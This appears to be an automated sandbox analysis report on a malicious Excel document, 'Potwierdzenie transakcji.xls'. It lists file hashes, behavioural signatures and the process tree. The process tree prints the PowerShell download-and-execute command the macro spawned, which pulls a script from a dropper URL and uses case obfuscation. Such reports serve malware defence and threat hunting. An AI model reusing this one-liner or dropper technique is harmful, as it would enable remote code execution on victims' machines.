Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows7_x64 -
resource
win7 -
submitted
30-06-2020 10:54
Static task
static1
Behavioral task
behavioral1
Sample
Potwierdzenie transakcji.xls
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Potwierdzenie transakcji.xls
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
Potwierdzenie transakcji.xls
-
Size
856KB
-
MD5
02bebda14734b392c40e86a08717e140
-
SHA1
95a6a416f682a9d254e76ec38ade01ce241b3366
-
SHA256
debf78ac913e3b76debc7c4745d1e9ff858d6f3392ad02db78eb18408ac4beaf
-
SHA512
9f72ca77987b210012156cba8f8b43c2e3bd0ff109c7c665088cc92eb4ca8374576c7f4c4b6dd67e04846124f143017c62ca9930d78f6bebe435bfb3382c992c
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://officeservicecorp.biz/Lab.jpg
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1448 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
EXCEL.EXEpid process 1448 EXCEL.EXE 1448 EXCEL.EXE 1448 EXCEL.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 284 1448 powershell.exe EXCEL.EXE -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
EXCEL.EXEdescription pid process target process PID 1448 wrote to memory of 284 1448 EXCEL.EXE powershell.exe PID 1448 wrote to memory of 284 1448 EXCEL.EXE powershell.exe PID 1448 wrote to memory of 284 1448 EXCEL.EXE powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 284 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 284 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 1448 EXCEL.EXE 1448 EXCEL.EXE
Processes
-
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Potwierdzenie transakcji.xls"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://officeservicecorp.biz/Lab.jpg')2⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/284-0-0x0000000000000000-mapping.dmp